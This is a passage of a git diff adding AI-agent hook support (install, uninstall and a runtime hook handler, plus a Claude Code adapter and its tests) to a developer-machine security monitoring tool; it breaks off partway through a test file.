diff --git a/cmd/stepsecurity-dev-machine-guard/main.go b/cmd/stepsecurity-dev-machine-guard/main.go index 3a6742f..c512f2a 100644 --- a/cmd/stepsecurity-dev-machine-guard/main.go +++ b/cmd/stepsecurity-dev-machine-guard/main.go @@ -1,10 +1,12 @@ package main import ( + "context" "fmt" "os" "runtime" + aiagentscli "github.com/step-security/dev-machine-guard/internal/aiagents/cli" "github.com/step-security/dev-machine-guard/internal/buildinfo" "github.com/step-security/dev-machine-guard/internal/cli" "github.com/step-security/dev-machine-guard/internal/config" @@ -18,6 +20,18 @@ import ( ) func main() { + // Hook hot path. Agents invoke `_hook` on every event and any non-zero + // exit is treated as a hook failure / block — so we MUST exit 0 even on + // malformed args. Skip every line below this branch (CLI parsing, + // executor construction, logger setup) to keep the runtime budget + // realistic; the 15s hook cap has to absorb identity probes and a 5s + // upload, every millisecond here is dead weight. RunHook owns its own + // minimal config.Load (just enough for the upload gate) so this branch + // stays free of the rest of main's setup work. 
+ if len(os.Args) >= 2 && os.Args[1] == "_hook" { + os.Exit(aiagentscli.RunHook(os.Stdin, os.Stdout, os.Stderr, os.Args[2:])) + } + // Load persisted config (~/.stepsecurity/config.json) before parsing CLI config.Load() @@ -159,6 +173,12 @@ func main() { os.Exit(1) } + case "hooks install": + os.Exit(aiagentscli.RunInstall(context.Background(), exec, cfg.HooksAgent, os.Stdout, os.Stderr)) + + case "hooks uninstall": + os.Exit(aiagentscli.RunUninstall(context.Background(), exec, cfg.HooksAgent, os.Stdout, os.Stderr)) + default: // Community mode or auto-detect enterprise switch { diff --git a/go.mod b/go.mod index 951ad13..85525c7 100644 --- a/go.mod +++ b/go.mod @@ -4,4 +4,13 @@ go 1.24 require golang.org/x/sys v0.33.0 -require github.com/google/uuid v1.6.0 +require ( + github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 + github.com/google/uuid v1.6.0 + github.com/pelletier/go-toml/v2 v2.3.1 + github.com/tidwall/gjson v1.18.0 + github.com/tidwall/pretty v1.2.1 + github.com/tidwall/sjson v1.2.5 +) + +require github.com/tidwall/match v1.1.1 // indirect diff --git a/go.sum b/go.sum index d70ecf3..c65ccc5 100644 --- a/go.sum +++ b/go.sum @@ -1,4 +1,18 @@ +github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510 h1:El6M4kTTCOh6aBiKaUGG7oYTSPP8MxqL4YI3kZKwcP4= +github.com/google/shlex v0.0.0-20191202100458-e7afc7fbc510/go.mod h1:pupxD2MaaD3pAXIBCelhxNneeOaAeabZDe5s4K6zSpQ= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/pelletier/go-toml/v2 v2.3.1 h1:MYEvvGnQjeNkRF1qUuGolNtNExTDwct51yp7olPtrEc= +github.com/pelletier/go-toml/v2 v2.3.1/go.mod h1:2gIqNv+qfxSVS7cM2xJQKtLSTLUE9V8t9Stt+h56mCY= +github.com/tidwall/gjson v1.14.2/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= +github.com/tidwall/gjson v1.18.0 h1:FIDeeyB800efLX89e5a8Y0BNH+LOngJyGrIWxG2FKQY= +github.com/tidwall/gjson v1.18.0/go.mod 
h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= +github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA= +github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= +github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= +github.com/tidwall/pretty v1.2.1 h1:qjsOFOWWQl+N3RsoF5/ssm1pHmJJwhjlSbZ51I6wMl4= +github.com/tidwall/pretty v1.2.1/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= +github.com/tidwall/sjson v1.2.5 h1:kLy8mja+1c9jlljvWTlSazM7cKDRfJuR/bOJhcY5NcY= +github.com/tidwall/sjson v1.2.5/go.mod h1:Fvgq9kS/6ociJEDnK0Fk1cpYF4FIW6ZF7LAe+6jwd28= golang.org/x/sys v0.33.0 h1:q3i8TbbEz+JRD9ywIRlyRAQbM0qF7hu24q3teo2hbuw= golang.org/x/sys v0.33.0/go.mod h1:BJP2sWEmIv4KK5OTEluFJCKSidICx8ciO85XgH3Ak8k= diff --git a/internal/aiagents/adapter/adapter.go b/internal/aiagents/adapter/adapter.go new file mode 100644 index 0000000..f94fe6e --- /dev/null +++ b/internal/aiagents/adapter/adapter.go @@ -0,0 +1,236 @@ +// Package adapter defines the contract every per-agent integration +// (Claude Code, Codex) implements. +// +// Lifecycle of an Adapter: +// +// - hooks install handler ⇢ Detect, ManagedFiles, Install +// - hooks uninstall handler ⇢ ManagedFiles, Uninstall +// - _hook runtime ⇢ ParseEvent, ShellCommand, DecideResponse +// +// The interface is intentionally trimmed: Restore, Status, +// RestoreOptions, BackupInfo, and HookStatus are absent — `hooks restore` +// and `hooks status` are not in scope. Reintroducing them is a public-API +// change, so adapters should not invent stubs that hint they are coming +// back. +// +// Constructors take the user's home directory and the resolved DMG +// binary path. Adapters compute their own settings file paths (e.g. +// ~/.claude/settings.json, ~/.codex/{hooks.json,config.toml}) from +// home, and embed binaryPath (absolute, symlinks resolved) into the +// hook command they write into settings. 
Both pieces of state are +// immutable for the lifetime of the adapter. +package adapter + +import ( + "context" + "time" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// DetectionResult reports whether the agent is installed locally. +// +// Detection is by executor.LookPath of the agent's CLI binary +// (claude / codex). Settings file presence is NOT a gate — install +// creates the settings file from scratch when absent. +type DetectionResult struct { + // Detected is true iff the agent's CLI binary is on $PATH. + Detected bool + + // BinaryPath is the resolved absolute path returned by LookPath + // when Detected=true; empty otherwise. Diagnostic only — install + // does not invoke the agent binary. + BinaryPath string + + // Notes are user-facing diagnostic strings. Examples: "settings + // file does not exist; install will create it". + Notes []string +} + +// ManagedFile describes one file an adapter mutates. The install / +// uninstall handlers consult this list so they never have to hardcode +// per-agent paths or labels — and the install handler walks it (plus +// CreatedDirs from InstallResult) to chown the full set under root. +type ManagedFile struct { + // Label is the user-facing path with $HOME tildified (e.g. + // "~/.claude/settings.json"). Used in diagnostic output. + Label string + // Path is the absolute filesystem path. + Path string +} + +// InstallResult describes what install actually did. +// +// The install handler walks WrittenFiles ∪ BackupFiles ∪ CreatedDirs +// to chown the full set to the console user under root. Adapters must +// populate all three slices. +type InstallResult struct { + // HooksAdded names the hook events for which a new entry was + // added. Order matches the adapter's SupportedHooks() order. 
+ HooksAdded []event.HookEvent + + // HooksKept names hook events whose entry was already in place + // and untouched (idempotent reinstall). + HooksKept []event.HookEvent + + // WrittenFiles are settings files (and side-effect files such as + // Codex's config.toml) that Install created or rewrote. Absolute + // paths only. Empty when the install was a complete no-op. + WrittenFiles []string + + // BackupFiles are pre-existing files Install copied aside before + // rewriting, named with the .dmg-<timestamp>.bak suffix from + // internal/aiagents/atomicfile. + BackupFiles []string + + // CreatedDirs are parent directories Install mkdir'd. Order is + // shallowest-first so chown can apply parent-before-child without + // a second pass. + CreatedDirs []string + + // Notes are user-facing diagnostic strings. + Notes []string +} + +// UninstallResult describes the side effects of uninstall. +// +// The settings file is never deleted, even when uninstall removes the +// last entry — leaving an empty settings object behind preserves any +// non-hook configuration the user had in there. +type UninstallResult struct { + // HooksRemoved names hook events from which at least one + // DMG-owned entry was removed. Sorted for stable output. + HooksRemoved []event.HookEvent + + // WrittenFiles are settings files Uninstall rewrote. + WrittenFiles []string + + // BackupFiles are pre-existing settings files copied aside before + // rewrite, with the .dmg-<timestamp>.bak suffix. + BackupFiles []string + + // Notes are user-facing diagnostic strings. + Notes []string +} + +// Decision is the agent-agnostic verdict the runtime hands to +// DecideResponse. It carries ONLY the two fields the wire format +// actually needs; the richer event.PolicyDecisionInfo (with code, +// internal detail, would_block, etc.) lives on the event itself. +// +// A zero-value Decision means "deny with no reason" — callers should +// always construct via AllowDecision() or with explicit Allow=true.
+// +// Today the runtime NEVER returns Allow=false to the agent: the policy +// evaluator is forced to audit mode. DecideResponse implementations +// must still handle Allow=false correctly because the same code path +// will serve block mode in a future revision. +type Decision struct { + Allow bool + // UserMessage is shown on block; ignored on allow. The fixed + // user-visible deny string is "Blocked by your organization's + // administrator." — UserMessage is the upstream rationale used + // in telemetry, not what the end user sees. + UserMessage string +} + +// AllowDecision is the canonical zero-message allow. +func AllowDecision() Decision { return Decision{Allow: true} } + +// HookResponse is the adapter-agnostic return type from DecideResponse. +// The runtime treats it as opaque and json-marshals it to stdout; the +// concrete shape is the adapter's responsibility and lives inside the +// adapter's own subpackage. This boundary is what lets future adapters +// define their own wire format without bleeding into the hot path or +// any shared type. +type HookResponse any + +// BackupInfo is the value side of (path, timestamp) backup entries. +// Reserved here for future hooks-restore work; not used by current +// install/uninstall but kept on the public API so adding it later +// does not require a fresh type. (Held in this package because +// atomicfile and the install handler share the (path, time) pair.) +type BackupInfo struct { + Path string + Timestamp time.Time +} + +// Adapter is the per-agent integration contract. +// +// Implementations must be safe to construct cheaply (the install +// handler builds one per detected agent) and stateless across method +// calls — adapter state is set at construction time (home dir, binary +// path) and not mutated by methods. Each method receives any per-call +// inputs explicitly so the adapter does not coordinate shared state. 
+type Adapter interface { + // Name is the canonical agent slug used on the CLI (`--agent + // <name>`), in the `_hook <agent>` runtime invocation, and in the + // event payload. Returns "claude-code" or "codex". + Name() string + + // SupportedHooks returns the agent-defined hook events DMG + // installs entries for. Order is preserved in user-facing + // install diagnostics. Returned slice is owned by the caller. + SupportedHooks() []event.HookEvent + + // ManagedFiles enumerates every file this adapter mutates, + // computed from the home directory baked in at construction + // time. Used by the install handler for the chown sweep under + // root and by uninstall to know what to inspect. + ManagedFiles() []ManagedFile + + // Detect reports whether the agent is installed on this machine. + // Implementations call exec.LookPath on the agent's CLI binary; + // any LookPath error becomes Detected=false (no error return — + // detection is a query, not an operation). + Detect(ctx context.Context, exec executor.Executor) (DetectionResult, error) + + // Install writes hook entries into the agent's settings file(s). + // Idempotent: when the entries are already present and unchanged, + // returns empty WrittenFiles and BackupFiles and performs no + // writes. + // + // Multi-file adapters (Codex writes both hooks.json and + // config.toml) MUST validate-and-encode every output buffer + // before writing the first one — a half-applied install leaves + // the agent in a worse state than no install. + Install(ctx context.Context) (InstallResult, error) + + // Uninstall removes DMG-owned hook entries from the agent's + // settings. Match criterion: the entry's command field matches + // the per-adapter pattern derived from the resolved DMG binary + // path. Third-party hooks from other tools are intentionally not + // matched. + // + // The settings file is never deleted, even if uninstall empties + // it of hooks.
+ Uninstall(ctx context.Context) (UninstallResult, error) + + // ParseEvent decodes a payload that the agent piped to + // `_hook <agent> <hookType>` on stdin. The runtime reads stdin + // (capped at 5 MiB by hook/stdin.go), and passes the hookType + // from the CLI args plus the raw bytes here. The CLI arg is the + // canonical hookType — payload mismatches are recorded as + // event.ErrorInfo, not promoted to the wire field. + // + // Errors are returned verbatim. The runtime's fail-open contract + // (cli/hook.go) means a ParseEvent error becomes an allow + // response on stdout, with the error logged to errlog. + ParseEvent(ctx context.Context, hookType event.HookEvent, raw []byte) (*event.Event, error) + + // ShellCommand extracts the redacted shell command (and its + // working directory) from a parsed event, when the underlying + // tool is a shell. Adapters whose agents have no shell tool + // return ok=false. The returned command is already redacted. + ShellCommand(ev *event.Event) (cmd string, cwd string, ok bool) + + // DecideResponse renders a Decision into the agent's expected + // stdout response shape. The runtime json-marshals the result + // and writes it to stdout verbatim. + // + // The runtime always passes AllowDecision() today. The Allow=false + // path is exercised only by adapter unit tests until block mode + // ships. + DecideResponse(ev *event.Event, d Decision) HookResponse +} diff --git a/internal/aiagents/adapter/adapter_test.go b/internal/aiagents/adapter/adapter_test.go new file mode 100644 index 0000000..06127a9 --- /dev/null +++ b/internal/aiagents/adapter/adapter_test.go @@ -0,0 +1,93 @@ +package adapter_test + +import ( + "context" + "testing" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// stubAdapter is the minimal type that satisfies adapter.Adapter.
The +// var assignment below is a compile-time assertion that the interface +// is implementable as currently defined — if a method is added or its +// signature changes, this file fails to build, surfacing the breakage +// to every implementer at once. +type stubAdapter struct{} + +func (stubAdapter) Name() string { return "stub" } +func (stubAdapter) SupportedHooks() []event.HookEvent { return nil } +func (stubAdapter) ManagedFiles() []adapter.ManagedFile { + return nil +} +func (stubAdapter) Detect(context.Context, executor.Executor) (adapter.DetectionResult, error) { + return adapter.DetectionResult{}, nil +} +func (stubAdapter) Install(context.Context) (adapter.InstallResult, error) { + return adapter.InstallResult{}, nil +} +func (stubAdapter) Uninstall(context.Context) (adapter.UninstallResult, error) { + return adapter.UninstallResult{}, nil +} +func (stubAdapter) ParseEvent(context.Context, event.HookEvent, []byte) (*event.Event, error) { + return nil, nil +} +func (stubAdapter) ShellCommand(*event.Event) (string, string, bool) { + return "", "", false +} +func (stubAdapter) DecideResponse(*event.Event, adapter.Decision) adapter.HookResponse { + return nil +} + +var _ adapter.Adapter = stubAdapter{} + +func TestAllowDecisionIsAllow(t *testing.T) { + d := adapter.AllowDecision() + if !d.Allow { + t.Error("AllowDecision().Allow must be true") + } + if d.UserMessage != "" { + t.Errorf("AllowDecision().UserMessage = %q, want empty", d.UserMessage) + } +} + +func TestZeroValueResultsAreUsable(t *testing.T) { + // The install/uninstall handlers iterate the result slices; a + // zero value must be safe to iterate without nil-check ceremony + // at the call site. 
+ var ir adapter.InstallResult + for range ir.HooksAdded { + t.Fatal("zero InstallResult should iterate zero times") + } + for range ir.WrittenFiles { + t.Fatal("zero InstallResult should iterate zero times") + } + for range ir.BackupFiles { + t.Fatal("zero InstallResult should iterate zero times") + } + for range ir.CreatedDirs { + t.Fatal("zero InstallResult should iterate zero times") + } + + var ur adapter.UninstallResult + for range ur.HooksRemoved { + t.Fatal("zero UninstallResult should iterate zero times") + } + for range ur.WrittenFiles { + t.Fatal("zero UninstallResult should iterate zero times") + } + for range ur.BackupFiles { + t.Fatal("zero UninstallResult should iterate zero times") + } +} + +func TestDetectionResultZeroValueIsNotDetected(t *testing.T) { + var dr adapter.DetectionResult + if dr.Detected { + t.Error("zero DetectionResult.Detected should be false") + } + if dr.BinaryPath != "" { + t.Errorf("zero DetectionResult.BinaryPath = %q, want empty", dr.BinaryPath) + } +} diff --git a/internal/aiagents/adapter/claudecode/adapter.go b/internal/aiagents/adapter/claudecode/adapter.go new file mode 100644 index 0000000..ff020fd --- /dev/null +++ b/internal/aiagents/adapter/claudecode/adapter.go @@ -0,0 +1,197 @@ +// Package claudecode implements the Adapter interface for Claude Code. +// +// Detection is by `executor.LookPath("claude")`. Settings live at +// <home>/.claude/settings.json. The hook command DMG writes is +// `<binaryPath> _hook claude-code <hookEvent>` where binaryPath is the +// absolute, symlink-resolved DMG binary path resolved at install time. +// +// Restore + Status are intentionally absent — see the package-level +// doc on adapter.Adapter for why the interface is trimmed.
+package claudecode + +import ( + "context" + "fmt" + "path/filepath" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// AgentName is the identifier DMG uses for Claude Code on the wire and +// in the `_hook <agent>` invocation. Adapter-private; the runtime +// never compares against it. +const AgentName = "claude-code" + +// AgentBinary is the name `executor.LookPath` searches for during +// detection. Adapter-private. +const AgentBinary = "claude" + +// Adapter implements adapter.Adapter for Claude Code. +// +// State is set once at construction and never mutated. settingsPath is +// derived from home; binaryPath is the absolute DMG binary path the +// install handler resolved via internal/aiagents/cli.Resolve. +type Adapter struct { + settingsPath string + binaryPath string +} + +// New constructs an Adapter for the given user home and resolved DMG +// binary path. Both arguments must be absolute; behavior with relative +// paths is undefined. +func New(home, binaryPath string) *Adapter { + return &Adapter{ + settingsPath: filepath.Join(home, ".claude", "settings.json"), + binaryPath: binaryPath, + } +} + +// Name returns the adapter agent name. +func (a *Adapter) Name() string { return AgentName } + +// ManagedFiles reports the single Claude settings file the adapter +// mutates. Used by the install handler for the chown sweep under root. +func (a *Adapter) ManagedFiles() []adapter.ManagedFile { + return []adapter.ManagedFile{{Label: "~/.claude/settings.json", Path: a.settingsPath}} +} + +// Detect reports whether the Claude Code CLI is on $PATH. Settings +// file presence is NOT a gate — install creates the file from scratch +// when absent.
+func (a *Adapter) Detect(ctx context.Context, exec executor.Executor) (adapter.DetectionResult, error) { + res := adapter.DetectionResult{} + bin, err := exec.LookPath(AgentBinary) + if err != nil { + // LookPath errors mean "not on $PATH" — that's a query result, + // not an operational failure. + res.Notes = append(res.Notes, "claude CLI not found on $PATH") + return res, nil + } + res.Detected = true + res.BinaryPath = bin + return res, nil +} + +// Install adds DMG-owned hooks for every supported hook event. +// +// Idempotent: when every entry is already in place, no file is written +// and HooksKept enumerates every event. When any entry is added or +// refreshed, the entire settings file is pretty-printed to canonical +// 2-space indent — formatting in keys we did not touch is normalized +// once on edit, which is an acceptable trade-off for human readability +// of the result. +func (a *Adapter) Install(ctx context.Context) (adapter.InstallResult, error) { + doc, err := loadSettings(a.settingsPath) + if err != nil { + return adapter.InstallResult{}, err + } + res := adapter.InstallResult{} + for _, ht := range supportedHookEvents { + if doc.upsertHook(ht, a.commandFor(ht)) { + res.HooksAdded = append(res.HooksAdded, ht) + } else { + res.HooksKept = append(res.HooksKept, ht) + } + } + wr, err := writeAtomic(a.settingsPath, doc) + if err != nil { + return res, err + } + if wr != nil { + res.WrittenFiles = append(res.WrittenFiles, wr.Path) + if wr.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, wr.BackupPath) + } + res.CreatedDirs = append(res.CreatedDirs, wr.CreatedDirs...) + } + return res, nil +} + +// Uninstall removes only DMG-owned hook entries. +// The settings file is preserved even when uninstall removes the last +// hook — leaving an empty {} (or whatever non-hook keys remain) keeps +// any user customization intact. 
+func (a *Adapter) Uninstall(ctx context.Context) (adapter.UninstallResult, error) { + doc, err := loadSettings(a.settingsPath) + if err != nil { + return adapter.UninstallResult{}, err + } + res := adapter.UninstallResult{} + res.HooksRemoved = doc.removeManagedHooks(a.binaryPath) + if len(res.HooksRemoved) == 0 { + res.Notes = append(res.Notes, "no DMG-owned hook entries found") + return res, nil + } + wr, err := writeAtomic(a.settingsPath, doc) + if err != nil { + return res, fmt.Errorf("claude uninstall: %w", err) + } + if wr != nil { + res.WrittenFiles = append(res.WrittenFiles, wr.Path) + if wr.BackupPath != "" { + res.BackupFiles = append(res.BackupFiles, wr.BackupPath) + } + } + return res, nil +} + +// commandFor renders the literal command string DMG writes into the +// settings entry for hookEvent. Format: +// +// <binaryPath> _hook claude-code <hookEvent> +// +// The binary path is absolute and symlink-resolved at install time; +// see internal/aiagents/cli/selfpath.go. +func (a *Adapter) commandFor(hookEvent event.HookEvent) string { + return a.binaryPath + " _hook " + AgentName + " " + string(hookEvent) +} + +// allowResponse is the Claude Code wire-format for "let the agent +// proceed." `{"continue": true, "suppressOutput": true}` is the +// canonical allow shape on every hook event. +type allowResponse struct { + Continue bool `json:"continue"` + SuppressOutput bool `json:"suppressOutput,omitempty"` +} + +// preToolUseBlockResponse is the spec-compliant PreToolUse block shape. +// Per https://code.claude.com/docs/en/hooks.md, blocking a tool call +// MUST go through hookSpecificOutput.permissionDecision; the legacy +// top-level `decision: "block"` is deprecated. We never emit +// `continue: false` — that field halts the agent entirely and is +// scope-mismatched for "block this single tool call."
+type preToolUseBlockResponse struct { + SuppressOutput bool `json:"suppressOutput,omitempty"` + HookSpecificOutput map[string]any `json:"hookSpecificOutput"` +} + +// DecideResponse renders a generic Decision into Claude Code's wire +// format. Routing is hook-type-aware: only PreToolUse has a defined +// block path today (the policy stage is filtered to PreToolUse + Bash). +// Every other hook event renders the generic allow shape on both +// allow and (defensively) on block, so a stray block decision can +// never accidentally halt the agent. +func (a *Adapter) DecideResponse(ev *event.Event, d adapter.Decision) adapter.HookResponse { + if d.Allow || ev == nil { + return allowResponse{Continue: true, SuppressOutput: true} + } + switch ev.HookEvent { + case event.HookPreToolUse: + msg := d.UserMessage + if msg == "" { + msg = "Blocked by your organization's administrator." + } + return preToolUseBlockResponse{ + SuppressOutput: true, + HookSpecificOutput: map[string]any{ + "hookEventName": "PreToolUse", + "permissionDecision": "deny", + "permissionDecisionReason": msg, + }, + } + default: + return allowResponse{Continue: true, SuppressOutput: true} + } +} diff --git a/internal/aiagents/adapter/claudecode/adapter_test.go b/internal/aiagents/adapter/claudecode/adapter_test.go new file mode 100644 index 0000000..70cb1f6 --- /dev/null +++ b/internal/aiagents/adapter/claudecode/adapter_test.go @@ -0,0 +1,805 @@ +package claudecode + +import ( + "bytes" + "context" + "encoding/json" + "os" + "path/filepath" + "slices" + "strings" + "testing" + + "github.com/step-security/dev-machine-guard/internal/aiagents/adapter" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/executor" +) + +// testBinary is the absolute DMG binary path tests pass to New(). 
The +// uninstall matcher (managedCmdRE) is path-token-agnostic, so the +// specific value just needs to satisfy `(^|/)stepsecurity-dev-machine-guard\s+_hook\s+`. +const testBinary = "/usr/local/bin/stepsecurity-dev-machine-guard" + +// newHomeWithSettings creates a tempdir-rooted ~/.claude/settings.json +// containing body and returns the home dir. The adapter under test +// computes its own settings path from home, so callers do not need to +// know the layout. +func newHomeWithSettings(t *testing.T, body string) string { + t.Helper() + home := t.TempDir() + dir := filepath.Join(home, ".claude") + if err := os.MkdirAll(dir, 0o700); err != nil { + t.Fatal(err) + } + if err := os.WriteFile(filepath.Join(dir, "settings.json"), []byte(body), 0o600); err != nil { + t.Fatal(err) + } + return home +} + +func settingsPath(home string) string { + return filepath.Join(home, ".claude", "settings.json") +} + +func mustParse(t *testing.T, path string) map[string]any { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + var out map[string]any + if err := json.Unmarshal(b, &out); err != nil { + t.Fatalf("settings JSON: %v", err) + } + return out +} + +func TestInstallPreservesUserHooks(t *testing.T) { + body := `{ + "theme": "dark", + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"type": "command", "command": "echo user"}]}, + {"matcher": "Bash", "hooks": [{"type": "command", "command": "echo bash-only"}]} + ] + } + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + res, err := a.Install(context.Background()) + if err != nil { + t.Fatalf("Install: %v", err) + } + if len(res.BackupFiles) == 0 { + t.Error("expected backup file") + } + if len(res.WrittenFiles) == 0 { + t.Error("expected written file") + } + + got := mustParse(t, settingsPath(home)) + hooks := got["hooks"].(map[string]any) + pre := hooks["PreToolUse"].([]any) + + // Find every command across the matchers; the user's must remain. 
+ var commands []string + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + commands = append(commands, hm["command"].(string)) + } + } + joined := strings.Join(commands, "\n") + if !strings.Contains(joined, "echo user") { + t.Errorf("user hook lost; got %q", joined) + } + if !strings.Contains(joined, "echo bash-only") { + t.Errorf("matcher-specific user hook lost; got %q", joined) + } + if !strings.Contains(joined, "stepsecurity-dev-machine-guard") { + t.Errorf("DMG hook missing; got %q", joined) + } + + // Theme key must survive. + if got["theme"] != "dark" { + t.Errorf("unrelated key lost") + } +} + +func TestUninstallRemovesOnlyManagedHooks(t *testing.T) { + // User hooks include lookalikes that the regex match must NOT touch: + // a tool whose name starts with the same prefix but isn't a separate + // word; a hyphenated suffix; an absolute path that is NOT the DMG + // binary; and an absolute-path non-DMG entry, all intentionally + // not matched. 
+ body := `{ + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [ + {"type": "command", "command": "stepsecurity-dev-machine-guardctl status"}, + {"type": "command", "command": "stepsecurity-dev-machine-guard-foo run"}, + {"type": "command", "command": "/usr/local/bin/other-tool _hook claude-code PreToolUse"}, + {"type": "command", "command": "echo user-other"} + ]} + ] + } + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatal(err) + } + res, err := a.Uninstall(context.Background()) + if err != nil { + t.Fatal(err) + } + if len(res.HooksRemoved) == 0 { + t.Fatal("expected at least one removal") + } + got := mustParse(t, settingsPath(home)) + hooks, _ := got["hooks"].(map[string]any) + if hooks == nil { + t.Fatal("hooks key removed despite remaining user entries") + } + pre := hooks["PreToolUse"].([]any) + survivors := []string{} + for _, raw := range pre { + group := raw.(map[string]any) + for _, h := range group["hooks"].([]any) { + hm := h.(map[string]any) + cmd, _ := hm["command"].(string) + survivors = append(survivors, cmd) + if isManagedCommand(cmd) { + t.Errorf("managed command survived uninstall: %q", cmd) + } + } + } + // Each lookalike user hook must remain. + for _, want := range []string{ + "stepsecurity-dev-machine-guardctl status", + "stepsecurity-dev-machine-guard-foo run", + "/usr/local/bin/other-tool _hook claude-code PreToolUse", + "echo user-other", + } { + if !slices.Contains(survivors, want) { + t.Errorf("lookalike user hook %q removed; survivors=%v", want, survivors) + } + } +} + +// rootKeyOrder returns the top-level JSON object keys of path in the +// order they appear in the file. We tokenize via json.Decoder so the +// test does not depend on the same parser the adapter uses. 
+func rootKeyOrder(t *testing.T, path string) []string { + t.Helper() + b, err := os.ReadFile(path) + if err != nil { + t.Fatal(err) + } + dec := json.NewDecoder(strings.NewReader(string(b))) + tok, err := dec.Token() + if err != nil || tok != json.Delim('{') { + t.Fatalf("expected root '{', got %v err %v", tok, err) + } + var keys []string + for dec.More() { + k, err := dec.Token() + if err != nil { + t.Fatal(err) + } + keys = append(keys, k.(string)) + var raw json.RawMessage + if err := dec.Decode(&raw); err != nil { + t.Fatal(err) + } + } + return keys +} + +func TestInstallPreservesRootKeyOrder(t *testing.T) { + // `z`, `hooks`, `a` is in non-lexical order; encoding/json + map[string]any + // would alphabetize it to `a`, `hooks`, `z`. + body := `{ + "z": "last", + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + }, + "a": "first" + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + got := rootKeyOrder(t, settingsPath(home)) + want := []string{"z", "hooks", "a"} + if len(got) != len(want) { + t.Fatalf("root keys: got %v, want %v", got, want) + } + for i := range want { + if got[i] != want[i] { + t.Errorf("root key order: got %v, want %v", got, want) + break + } + } +} + +func TestInstallPreservesUserHookEntryKeyOrder(t *testing.T) { + // User wrote keys as `timeout`, `type`, `command`. encoding/json on + // map[string]any would re-emit them as `command`, `timeout`, `type`. 
+ body := `{ + "hooks": { + "PreToolUse": [ + {"matcher": "Bash", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + } + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + b, _ := os.ReadFile(settingsPath(home)) + out := string(b) + // Find the user hook entry by command and verify timeout precedes + // type precedes command — the user's original order. + userIdx := strings.Index(out, `"echo user"`) + if userIdx < 0 { + t.Fatalf("user hook not found in output: %s", out) + } + entryStart := strings.LastIndex(out[:userIdx], "{") + entryEnd := strings.Index(out[userIdx:], "}") + if entryStart < 0 || entryEnd < 0 { + t.Fatalf("could not locate user entry: %s", out) + } + entry := out[entryStart : userIdx+entryEnd+1] + tIdx := strings.Index(entry, `"timeout"`) + yIdx := strings.Index(entry, `"type"`) + cIdx := strings.Index(entry, `"command"`) + if !(tIdx >= 0 && tIdx < yIdx && yIdx < cIdx) { + t.Errorf("user hook key order lost; entry: %s", entry) + } +} + +func TestUninstallLeavesUnrelatedKeysUntouched(t *testing.T) { + body := `{ + "z": "last", + "hooks": { + "PreToolUse": [ + {"matcher": "*", "hooks": [{"timeout": 5, "type": "command", "command": "echo user"}]} + ] + }, + "a": "first" + }` + home := newHomeWithSettings(t, body) + a := New(home, testBinary) + if _, err := a.Install(context.Background()); err != nil { + t.Fatalf("Install: %v", err) + } + if _, err := a.Uninstall(context.Background()); err != nil { + t.Fatalf("Uninstall: %v", err) + } + got := rootKeyOrder(t, settingsPath(home)) + zIdx, aIdx := -1, -1 + for i, k := range got { + if k == "z" { + zIdx = i + } + if k == "a" { + aIdx = i + } + } + if zIdx < 0 || aIdx < 0 || zIdx >= aIdx { + t.Errorf("expected z before a in %v", got) + } + // The user hook must have survived. 
